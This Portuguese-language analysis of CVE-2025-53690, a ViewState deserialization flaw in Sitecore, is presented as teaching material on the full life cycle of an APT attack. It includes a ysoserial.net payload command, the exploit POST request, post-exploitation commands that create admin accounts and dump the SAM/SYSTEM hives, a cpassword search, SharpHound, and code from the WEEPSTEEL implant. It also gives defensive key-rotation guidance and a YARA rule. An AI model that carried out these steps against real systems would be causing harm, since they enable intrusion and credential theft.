
Este é o documento de análise do CVE-2025-53690.
CVE-2025-53690 é uma vulnerabilidade de desserialização do ViewState encontrada na família de produtos Sitecore que permite execução remota de código ao explorar chaves de máquina ASP.NET expostas, sendo uma vulnerabilidade de segurança crítica.
O cerne desta vulnerabilidade está no gerenciamento incorreto de configuração:
ViewState é um recurso de gerenciamento de estado do ASP.NET que:
__VIEWSTATE<!-- Exemplo de web.config -->
<system.web>
<machineKey
validationKey="[chave de 64 bytes]"
decryptionKey="[chave de 48 bytes]"
validation="HMACSHA256"
decryption="AES" />
</system.web>
Alvo: /sitecore/blocked.aspx
Método: POST
Características: acessível sem autenticação, usa ViewState
O atacante gera o payload malicioso usando a chave de máquina conhecida e o ysoserial.net:
# Exemplo de uso com ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[chave]" --validationalg="HMACSHA256" --decryptionkey="[chave]" --decryptionalg="AES"
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=[payload_malicioso]&__VIEWSTATEGENERATOR=[valor]
/sitecore/blocked.aspx# Comandos executados
whoami
hostname
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"
Ferramentas implantadas:
7za.exe: ferramenta de compactação de arquivoslfe.ico: ferramenta de tunelamento de rede EARTHWORM1.vbs: script VBScript para execução de comandos# Criação de conta de administrador local
net user asp$ [senha] /add
net localgroup administrators asp$ /add
net user sawadmin [senha] /add
net localgroup administrators sawadmin /add
Coleta de credenciais:
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False
# Identificação do Domain Controller
nltest /DCLIST:[dominio]
nslookup [domain-controller]
# Busca por cpassword em GPO (ataque de Group Policy Preferences)
findstr /S /l cpassword \\[DC]\sysvol\[dominio]\policies\*.xml
# Execução do BloodHound/SharpHound
sh.exe -c all
// Informações coletadas
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
Directories = new Information.Directories
{
CurrentWebDirectory = HostingEnvironment.MapPath("~/")
},
OperatingSystemInformation = Information.GetOperatingSystemInformation(),
DiskInformation = Information.GetDiskInformation(),
NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
Process = Information.GetProcessInformation()
};
Método de saída: ocultação de dados disfarçada de ViewState
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{criptografia AES + saída codificada em base64}" />
<!-- Geração de chave de máquina exclusiva -->
<machineKey
validationKey="[nova_chave_de_64_bytes]"
decryptionKey="[nova_chave_de_48_bytes]"
validation="HMACSHA256"
decryption="AES" />
# Exemplo de regra YARA (detecção do WEEPSTEEL)
rule WEEPSTEEL_Detection {
strings:
$viewstate = "__VIEWSTATE"
$crypto = "System.Security.Cryptography"
$serializer = "JavaScriptSerializer"
condition:
all of them
}
O CVE-2025-53690 é um exemplo representativo de como um simples erro de configuração pode se transformar em uma ameaça de segurança crítica. Por meio dessa vulnerabilidade, os aprendizes podem vivenciar todo o ciclo de vida de um ataque APT real e compreender técnicas de ataque modernas e estratégias de defesa.